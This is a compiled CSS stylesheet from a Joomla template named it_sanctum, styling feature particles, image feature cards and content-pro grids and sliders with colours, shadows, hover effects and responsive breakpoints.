/* line 238, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 {
  margin-left: 0;
  margin-right: 0;
  color: #fff;
  text-align: left;
}
/* line 243, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-grid {
  margin-bottom: 0;
}
/* line 245, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 246, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
  box-shadow: -20px 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
  }
}
/* line 251, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item:last-child {
  box-shadow: 0 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
/* line 257, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item {
  padding: 35px 30px 40px;
  box-shadow: -20px -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
/* line 260, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(1) {
  background: #40782f;
}
/* line 263, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(2) {
  background: #478635;
}
/* line 266, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(3) {
  background: #4f953b;
}
/* line 269, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(4) {
  background: #57a441;
}
/* line 272, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(5) {
  background: #5eb247;
}
/* line 275, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:nth-child(6) {
  background: #6abb53;
}
/* line 278, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-item:last-child {
  box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style8 .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
    margin-bottom: 0;
  }
}
/* line 286, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-icon, .g-features-particle.style8 .g-features-particle-image {
  margin-bottom: 10px;
  color: #fff;
  border-radius: 0;
  width: auto;
  height: auto;
  line-height: inherit;
  font-size: 40px;
}
/* line 295, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-icon .g-circle-border, .g-features-particle.style8 .g-features-particle-image .g-circle-border {
  display: none;
}
/* line 299, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-title {
  color: #fff !important;
  font-size: 1.35rem;
}
/* line 302, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-title a {
  color: #fff;
}
/* line 304, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-title a:hover {
  text-decoration: underline;
}
/* line 309, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-desc, .g-features-particle.style8 .g-features-particle-subs {
  opacity: 0.85;
}
/* line 312, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-button {
  margin-top: 25px;
}
/* line 314, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-button .button {
  background: none;
  border: 2px solid #fff;
  color: #fff;
  border-radius: 50px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 320, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8 .g-features-particle-button .button:hover {
  background: #282828;
  border-color: #282828;
}
/* line 326, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style8.pull-up {
  margin-top: -7.5rem;
  position: relative;
  z-index: 4;
}
/* line 335, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 336, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
/* line 339, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-title a {
  color: #282828;
}
/* line 341, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-title a:hover {
  color: #4f953b;
}
/* line 346, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-icon {
  margin-right: 20px;
  color: #4f953b;
  font-size: 130%;
}
/* line 351, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle .g-features2-particle-image {
  margin-right: 20px;
  display: inline-block;
}
/* line 355, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 356, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 357, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style3 .g-grid .g-block {
  padding: 0 1rem;
}
/* line 361, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style3 .g-content {
  padding-top: 1rem;
  padding-bottom: 1rem;
  background: rgba(0, 0, 0, 0.2);
}
/* line 365, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style3 .g-content:after {
  content: "";
  width: 0;
  height: 0;
  border-top: 15px solid rgba(0, 0, 0, 0.2);
  border-right: 15px solid transparent;
  position: absolute;
  margin-top: 16px;
  margin-left: -15px;
  z-index: 99;
}
/* line 378, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 379, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-features2-particle-icon {
  float: left;
  font-size: 55px;
  margin-right: 0;
  color: #bbb;
}
/* line 385, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  max-width: 60px;
}
/* line 390, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-title-desc-container {
  margin-left: 75px;
}
/* line 393, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .g-features2-particle-title {
  margin-bottom: 10px;
}
/* line 396, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 397, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
/* line 401, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 402, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style4 .accent2 .g-features2-particle-icon {
  color: #282828;
}
/* line 407, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 408, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-icon {
  float: left;
  font-size: 24px;
  margin-right: 0;
  color: #afafaf;
  width: 60px;
  height: 60px;
  line-height: 60px;
  text-align: center;
  margin-top: 5px;
  border: 1px solid;
  border-radius: 50%;
}
/* line 421, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  width: 60px;
  height: 60px;
}
/* line 426, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-image img {
  border-radius: 50%;
  width: 60px;
  height: 60px;
}
/* line 432, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-title-desc-container {
  margin-left: 75px;
}
/* line 435, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .g-features2-particle-title {
  margin-bottom: 10px;
}
/* line 438, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 439, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
/* line 443, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 444, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features2-particle.style5 .accent2 .g-features2-particle-icon {
  color: #282828;
}
/* line 4, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 7, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-grid {
  margin-bottom: 1.876rem;
}
/* line 9, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-grid:last-child {
  margin-bottom: 0;
}
/* line 11, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_image-features.scss */
@media only all and (max-width: 47.938rem) {
  .g-image-features .g-grid:last-child .g-block:last-child .g-image-features-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-image-features .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_image-features.scss */
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-image-features > .g-grid > .g-block {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    margin-bottom: 1.876rem;
  }
  /* line 31, templates/it_sanctum/scss/sanctum/_image-features.scss */
  .g-image-features > .g-grid > .g-block:last-child {
    margin-bottom: 0;
  }
}
/* line 37, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-item {
  background: #fff;
  border: 1px solid #e2e2e2;
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.07);
  border-radius: 3px;
}
@media only all and (max-width: 47.938rem) {
  .g-image-features .g-image-features-item {
    margin-bottom: 2.3445rem;
  }
}
/* line 50, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 51, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 52, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-item.layout-right .g-image-features-image.uk-overlay {
  border-radius: 0 3px 3px 0;
}
/* line 55, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-item.layout-right .g-image-features-image img {
  border-radius: 0 3px 3px 0;
}
/* line 61, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image {
  position: relative;
}
/* line 63, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image img {
  width: 100%;
  border-radius: 3px 0 0 3px;
}
/* line 67, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 68, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image .uk-overlay-icon:before {
  content: "\f0c1";
}
/* line 72, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 3px 0 0 3px;
}
/* line 74, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image.uk-overlay img {
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 78, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 79, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 80, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image:hover.uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 85, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-image .uk-overlay-panel {
  z-index: 4;
}
/* line 89, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-content {
  padding: 20px;
}
/* line 92, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-desc {
  margin: 0;
}
/* line 95, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
/* line 98, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-title a {
  color: #282828;
}
/* line 100, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-title a:hover {
  color: #4f953b;
}
/* line 105, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-bottom-info {
  margin-top: 15px;
}
/* line 108, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-feature-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-feature-special {
    float: none;
  }
}
/* line 115, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-feature-special i {
  margin-right: 5px;
}
/* line 119, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-link {
  font-style: italic;
  float: right;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-features-link {
    float: none;
    margin-top: 5px;
  }
}
/* line 126, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-link i {
  margin-left: 10px;
}
/* line 130, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 131, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .no-special .g-image-features-link {
  float: none;
}
/* line 4, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 14, templates/it_sanctum/scss/sanctum/_content-pro.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_content-pro.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
/* line 32, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 41, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 51, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
/* line 53, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
/* line 57, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
/* line 61, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
/* line 65, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
/* line 67, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 68, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
/* line 74, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 79, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  /* line 83, templates/it_sanctum/scss/sanctum/_content-pro.scss */
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
/* line 88, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 89, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
}
/* line 92, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
/* line 96, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 100, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
/* line 103, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
/* line 105, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
/* line 107, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
/* line 112, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 0.4rem;
}
/* line 115, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 116, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
/* line 118, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
/* line 121, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #fff;
}
/* line 123, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
/* line 128, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset .g-info-container-style2 .g-content-pro-special, .g-content-pro .g-info-container-style2 .g-item-details, .g-content-pro-slider .g-info-container-style2 .g-item-details, .g-content-pro-slideset .g-info-container-style2 .g-item-details {
  color: #eee;
}
/* line 132, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
/* line 142, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-special i, .g-content-pro-slider .g-content-pro-special i, .g-content-pro-slideset .g-content-pro-special i {
  margin-right: 5px;
}
/* line 146, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
  float: right;
  font-style: italic;
}
/* line 149, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-link i, .g-content-pro-slider .g-content-pro-link i, .g-content-pro-slideset .g-content-pro-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
/* line 161, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 162, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .no-special .g-content-pro-link, .g-content-pro-slider .no-special .g-content-pro-link, .g-content-pro-slideset .no-special .g-content-pro-link {
  float: none;
}
/* line 166, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 167, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .no-link .g-content-pro-special, .g-content-pro-slider .no-link .g-content-pro-special, .g-content-pro-slideset .no-link .g-content-pro-special {
  float: none;
}
/* line 171, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-bottom-info, .g-content-pro-slider .g-bottom-info, .g-content-pro-slideset .g-bottom-info {
  margin-top: 15px;
}
/* line 174, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-item-details, .g-content-pro-slider .g-item-details, .g-content-pro-slideset .g-item-details {
  margin-top: 0.4rem;
  font-size: 90%;
  color: #c8c8c8;
}
/* line 178, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-item-details .date i, .g-content-pro-slider .g-item-details .date i, .g-content-pro-slideset .g-item-details .date i {
  margin-right: 5px;
}
/* line 184, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 185, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient( top , rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #fff;
}
/* line 190, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #fff;
  text-decoration: underline;
}
/* line 196, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 197, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 198, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
/* line 202, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 203, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 204, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 4, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 14, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
/* line 34, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
/* line 36, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
/* line 40, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
/* line 44, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 45, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
